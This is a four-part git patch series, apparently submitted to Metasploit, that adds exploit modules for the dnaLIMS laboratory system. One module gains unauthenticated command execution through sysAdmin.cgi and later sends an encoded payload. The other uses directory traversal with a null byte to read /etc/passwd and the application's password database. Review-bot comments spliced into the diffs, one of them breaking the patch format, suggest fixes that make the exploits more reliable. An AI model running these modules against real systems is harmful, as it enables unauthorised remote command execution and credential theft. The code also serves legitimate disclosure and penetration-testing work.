From 95a01b9f5e878974b8c66c4e6b8684ae416652e4 Mon Sep 17 00:00:00 2001
From: flakey-biscuits
Date: Thu, 9 Mar 2017 09:46:18 -0500
Subject: [PATCH 1/4] add dnaLIMS exploits
---
 .../exploits/linux/http/dnalims_admin_exec.rb | 109 ++++++++++++++++++
 .../linux/http/dnalims_file_retrieve.rb | 84 ++++++++++++++
 2 files changed, 193 insertions(+)
 create mode 100644 modules/exploits/linux/http/dnalims_admin_exec.rb
 create mode 100644 modules/exploits/linux/http/dnalims_file_retrieve.rb
diff --git a/modules/exploits/linux/http/dnalims_admin_exec.rb b/modules/exploits/linux/http/dnalims_admin_exec.rb
new file mode 100644
index 0000000000..879ee29e30
--- /dev/null
+++ b/modules/exploits/linux/http/dnalims_admin_exec.rb
@@ -0,0 +1,109 @@
+
+
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'dnaLIMS Admin Module Command Execution',
+ 'Description' => %q{
+ This module utilizes an administrative module which allows for
+ command execution. This page is completely unprotected from any
+ authentication when given a POST command.
+ },
+ 'Author' =>
+ [
+ 'h00die ', # Discovery, PoC
+ 'flakey_biscuit' # Discovery, PoC
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ ['CVE', '2017-6526']
+ ['US-CERT-VU', '929263']
+ ['URL', 'https://www.shorebreaksecurity.com/blog/product-security-advisory-psa0002-dnalims/']
+ ],
+ 'Platform' => %w( linux unix ),
+ 'Arch' => ARCH_CMD,
+ 'Payload' =>
+ {
+ 'Space' => 1024,
+ 'DisableNops' => true,
+ 'Compat' =>
+ {
+ 'RequiredCmd' => 'perl' # software written in perl, and guaranteed to be there
+ }
+ },
+ 'Targets' =>
+ [
+ [ 'Automatic Target', { }]
+ ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => 'Mar 8 2017'
+ ))
+
+ register_options(
+ [
+ OptString.new('TARGETURI', [true, 'The base path to dnaLIMS', '/cgi-bin/dna/'])
+ ], self.class
+ )
+ end
+
+ def check
+ begin
+ res = send_request_cgi(
+ 'uri' => normalize_uri(target_uri.path, 'sysAdmin.cgi'),
+ 'method' => 'POST',
+ 'vars_post' => {
+ 'investigator' => '',
+ 'username' => '',
+ 'navUserName' => '',
+ 'Action' => 'executeCmd',
+ 'executeCmdData' => 'perl -V'
+ }
+ )
+ if res && res.body
+ if /Summary of/ =~ res.body
+ Exploit::CheckCode::Vulnerable
+ else
+ Exploit::CheckCode::Safe
+ end
+ else
+ Exploit::CheckCode::Safe
+ end
+ rescue ::Rex::ConnectionError
+ fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+ end
+ end
+
+ def exploit
+ begin
+ vprint_status('Sending Exploit')
+ res = send_request_cgi(
+ 'uri' => normalize_uri(target_uri.path, 'sysAdmin.cgi'),
+ 'method' => 'POST',
+ 'vars_post' => {
+ 'investigator' => '',
+ 'username' => '',
+ 'navUserName' => '',
+ 'Action' => 'executeCmd',
+ 'executeCmdData' => 'ls',
+ }
+ )
+ vprint_good(res.body)
+ rescue ::Rex::ConnectionError
+ fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+ end
+ end
+end
+
+
diff --git a/modules/exploits/linux/http/dnalims_file_retrieve.rb b/modules/exploits/linux/http/dnalims_file_retrieve.rb
new file mode 100644
index 0000000000..521fd71749
--- /dev/null
+++ b/modules/exploits/linux/http/dnalims_file_retrieve.rb
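Review bot: `vprint_good(res.body)` in `exploit` dereferences `res` with no nil check, although the `check` method just above guards the identical call with `if res && res.body`; `send_request_cgi` returns nil when no response comes back, which is an ordinary outcome once the request carries a payload, so the module would die with NoMethodError instead of finishing cleanly. Change the line to `vprint_good(res.body) if res && res.body`. The same unguarded line is carried as context in the `@@ -96,7 +94,7 @@` hunk of PATCH 3/4, where `executeCmdData` becomes `payload.encoded`, so the guard is needed there as well.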
@@ -0,0 +1,84 @@
+
+
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Auxiliary
+
+ include Msf::Auxiliary::Scanner
+ include Msf::Auxiliary::Report
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'DnaLIMS Directory Traversal',
+ 'Description' => %q{
+ This module exploits a directory traversal vulnerability found in dnaLIMS.
+ Due to the way the viewAppletFsa.cgi script handles the 'secID' parameter, it is possible
+ to read a file outside the www directory.
+ },
+ 'References' =>
+ [
+ ['CVE', '2017-6527']
+ ['US-CERT-VU', '929263']
+ ['URL', 'https://www.shorebreaksecurity.com/blog/product-security-advisory-psa0002-dnalims/']
+ ],
+ 'Author' =>
+ [
+ 'h00die', # Discovery, PoC
+ 'flakey_biscuit' # Discovery, PoC
+ ],
+ 'License' => MSF_LICENSE,
+ 'DisclosureDate' => "N/A"
+ ))
+
+ register_options(
+ [
+ OptString.new('TARGETURI', [true, 'The base path to dnaLIMS', '/cgi-bin/dna/']),
+ OptString.new('FILE', [ true, "The path to the file to view", '/etc/passwd']),
+ OptInt.new('DEPTH', [true, 'The max traversal depth', 11])
+ ], self.class)
+
+ deregister_options('RHOST')
+ end
+
+
+ def run_host(ip)
+ file = (datastore['FILE'][0,1] == '/') ? datastore['FILE'] : "#{datastore['FILE']}"
+ traverse = "../" * datastore['DEPTH']
+ uri = normalize_uri(target_uri.path)
+ base = File.dirname("#{uri}/.")
+
+ print_status("Requesting: #{file} - #{rhost}")
+ res = send_request_cgi({
+ 'uri' => "#{base}/viewAppletFsa.cgi",
+ 'vars_get' => { 'secID' => "#{traverse}#{file}",
+ 'Action' => 'blast',
+ 'hidenav' => '1'
+ }
+ })
+
+ if not res
+ print_error("No response from server.")
+ return
+ end
+
+
+ if res.code != 200
+ print_error("Server returned a non-200 response (body will not be saved):")
+ print_line(res.to_s)
+ return
+ end
+
+ vprint_line(res.body)
+ p = store_loot('dnaLIMS.traversal.file', 'application/octet-stream', ip, res.body, File.basename(file))
+ print_good("File saved as: #{p}")
+ end
+
+end
+
+
From 0ab3ad86ee9c17fc761548db668cd679036940ac Mon Sep 17 00:00:00 2001
From: flakey-biscuits
Date: Thu, 9 Mar 2017 10:06:31 -0500
Subject: [PATCH 2/4] change dnalims_file_retrieve module type
---
 modules/exploits/linux/http/dnalims_file_retrieve.rb | 7 ++++---
 1 file changed, 4 insertions(+), 3 deletions(-)
diff --git a/modules/exploits/linux/http/dnalims_file_retrieve.rb b/modules/exploits/linux/http/dnalims_file_retrieve.rb
index 521fd71749..5429601ec8 100644
--- a/modules/exploits/linux/http/dnalims_file_retrieve.rb
+++ b/modules/exploits/linux/http/dnalims_file_retrieve.rb
@@ -7,7 +7,8 @@ require 'msf/core'
-class MetasploitModule < Msf::Auxiliary
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
 include Msf::Auxiliary::Scanner
 include Msf::Auxiliary::Report
@@ -33,7 +34,7 @@ class MetasploitModule < Msf::Auxiliary
 'flakey_biscuit' # Discovery, PoC
 ],
 'License' => MSF_LICENSE,
- 'DisclosureDate' => "N/A"
+ 'DisclosureDate' => "Mar 8 2017"
 ))
 register_options(
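Review bot: The `file` assignment at the top of `run_host` is a no-op: both branches of the ternary evaluate to `datastore['FILE']` unchanged, so a relative FILE value is sent without a leading `/` even though the `[0,1] == '/'` test suggests one was meant to be prepended. Presumably the else branch should read `"/#{datastore['FILE']}"`; if no prefix is intended, drop the ternary and write `file = datastore['FILE']`. The request URI is also built by hand via `File.dirname("#{uri}/.")`, where `normalize_uri(target_uri.path, 'viewAppletFsa.cgi')` — the form the sibling dnalims_admin_exec module uses — is the conventional HttpClient idiom and avoids the trailing-slash juggling. `if not res` reads better as `unless res`.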
@@ -56,7 +57,7 @@ class MetasploitModule < Msf::Auxiliary
 print_status("Requesting: #{file} - #{rhost}")
 res = send_request_cgi({
 'uri' => "#{base}/viewAppletFsa.cgi",
- 'vars_get' => { 'secID' => "#{traverse}#{file}",
+ 'vars_get' => { 'secID' => "#{traverse}#{file}",
 'Action' => 'blast',
 'hidenav' => '1'
 }
From fe5167bf2686d8211aa7323bd1fe3781a8f800ff Mon Sep 17 00:00:00 2001
From: h00die
Date: Mon, 20 Mar 2017 10:16:42 -0400
Subject: [PATCH 3/4] changes to file per pr
---
 modules/exploits/linux/http/dnalims_admin_exec.rb | 10 ++++------
 1 file changed, 4 insertions(+), 6 deletions(-)
diff --git a/modules/exploits/linux/http/dnalims_admin_exec.rb b/modules/exploits/linux/http/dnalims_admin_exec.rb
index 879ee29e30..11e0dee83f 100644
--- a/modules/exploits/linux/http/dnalims_admin_exec.rb
+++ b/modules/exploits/linux/http/dnalims_admin_exec.rb
@@ -1,5 +1,3 @@
-
-
 ##
 # This module requires Metasploit: http://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
@@ -18,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote
 'Description' => %q{
 This module utilizes an administrative module which allows for
 command execution. This page is completely unprotected from any
- authentication when given a POST command.
+ authentication when given a POST request.
 },
 'Author' =>
 [
@@ -28,8 +26,8 @@ class MetasploitModule < Msf::Exploit::Remote
 'License' => MSF_LICENSE,
 'References' =>
 [
- ['CVE', '2017-6526']
- ['US-CERT-VU', '929263']
+ ['CVE', '2017-6526'],
+ ['US-CERT-VU', '929263'],
 ['URL', 'https://www.shorebreaksecurity.com/blog/product-security-advisory-psa0002-dnalims/']
 ],
 'Platform' => %w( linux unix ),
@@ -96,7 +94,7 @@ class MetasploitModule < Msf::Exploit::Remote
 'username' => '',
 'navUserName' => '',
 'Action' => 'executeCmd',
- 'executeCmdData' => 'ls',
+ 'executeCmdData' => payload.encoded,
 }
 )
 vprint_good(res.body)
From fd5345a869d09362359113cd945bce07b360b9a5 Mon Sep 17 00:00:00 2001
From: h00die
Date: Mon, 20 Mar 2017 10:40:43 -0400
Subject: [PATCH 4/4] updates per pr
---
 .../scanner}/http/dnalims_file_retrieve.rb | 22 ++++++++-----------
 .../exploits/linux/http/dnalims_admin_exec.rb | 4 ++--
 2 files changed, 11 insertions(+), 15 deletions(-)
 rename modules/{exploits/linux => auxiliary/scanner}/http/dnalims_file_retrieve.rb (81%)
diff --git a/modules/exploits/linux/http/dnalims_file_retrieve.rb b/modules/auxiliary/scanner/http/dnalims_file_retrieve.rb
similarity index 81%
rename from modules/exploits/linux/http/dnalims_file_retrieve.rb
rename to modules/auxiliary/scanner/http/dnalims_file_retrieve.rb
index 5429601ec8..8ba8c83828 100644
--- a/modules/exploits/linux/http/dnalims_file_retrieve.rb
+++ b/modules/auxiliary/scanner/http/dnalims_file_retrieve.rb
@@ -1,5 +1,3 @@
-
-
 ##
 # This module requires Metasploit: http://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
@@ -7,8 +5,7 @@ require 'msf/core'
-class MetasploitModule < Msf::Exploit::Remote
- Rank = ExcellentRanking
+class MetasploitModule < Msf::Auxiliary
 include Msf::Auxiliary::Scanner
 include Msf::Auxiliary::Report
@@ -24,14 +21,14 @@ class MetasploitModule < Msf::Exploit::Remote
 },
 'References' =>
 [
- ['CVE', '2017-6527']
- ['US-CERT-VU', '929263']
+ ['CVE', '2017-6527'],
+ ['US-CERT-VU', '929263'],
 ['URL', 'https://www.shorebreaksecurity.com/blog/product-security-advisory-psa0002-dnalims/']
 ],
 'Author' =>
 [
- 'h00die', # Discovery, PoC
- 'flakey_biscuit' # Discovery, PoC
+ 'h00die ', # Discovery, PoC
+ 'flakey_biscuit ' # Discovery, PoC
 ],
 'License' => MSF_LICENSE,
 'DisclosureDate' => "Mar 8 2017"
@@ -40,8 +37,8 @@ class MetasploitModule < Msf::Exploit::Remote
 register_options(
 [
 OptString.new('TARGETURI', [true, 'The base path to dnaLIMS', '/cgi-bin/dna/']),
- OptString.new('FILE', [ true, "The path to the file to view", '/etc/passwd']),
- OptInt.new('DEPTH', [true, 'The max traversal depth', 11])
+ OptString.new('FILE', [ true, "The path to the file to view", '/home/dna/spool/.pfile']), # password db for app
+ OptInt.new('DEPTH', [true, 'The traversal depth', 4])
 ], self.class)
 deregister_options('RHOST')
@@ -57,7 +54,7 @@ class MetasploitModule < Msf::Exploit::Remote
 print_status("Requesting: #{file} - #{rhost}")
 res = send_request_cgi({
 'uri' => "#{base}/viewAppletFsa.cgi",
- 'vars_get' => { 'secID' => "#{traverse}#{file}",
+ 'vars_get' => { 'secID' => "#{traverse}#{file}%00",
 'Action' => 'blast',
 'hidenav' => '1'
 }
@@ -68,14 +65,13 @@ class MetasploitModule < Msf::Exploit::Remote
 return
 end
-
 if res.code != 200
 print_error("Server returned a non-200 response (body will not be saved):")
 print_line(res.to_s)
 return
 end
- vprint_line(res.body)
+ vprint_good(res.body)
 p = store_loot('dnaLIMS.traversal.file', 'application/octet-stream', ip, res.body, File.basename(file))
 print_good("File saved as: #{p}")
 end
diff --git a/modules/exploits/linux/http/dnalims_admin_exec.rb b/modules/exploits/linux/http/dnalims_admin_exec.rb
index 11e0dee83f..dd4c92822a 100644
--- a/modules/exploits/linux/http/dnalims_admin_exec.rb
+++ b/modules/exploits/linux/http/dnalims_admin_exec.rb
@@ -20,8 +20,8 @@ class MetasploitModule < Msf::Exploit::Remote
 },
 'Author' =>
 [
- 'h00die ', # Discovery, PoC
- 'flakey_biscuit' # Discovery, PoC
+ 'h00die ', # Discovery, PoC
+ 'flakey_biscuit ' # Discovery, PoC
 ],
 'License' => MSF_LICENSE,
 'References' =>
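Review bot: DEPTH still has no lower bound after its default is changed in the `@@ -40,8 +37,8 @@` hunk, and `"../" * datastore['DEPTH']` in `run_host` (outside this hunk) raises ArgumentError on a negative value rather than reporting a usable error to the operator. A guard at the top of `run_host` such as `return print_error('DEPTH must be zero or greater') if datastore['DEPTH'] < 0` keeps a bad option from aborting the whole scan. The `# password db for app` remark on the new FILE default would serve users better folded into the option description, e.g. `'The path to the file to view (default: the dnaLIMS password database)'`, since the description is what `show options` displays and a trailing code comment is not.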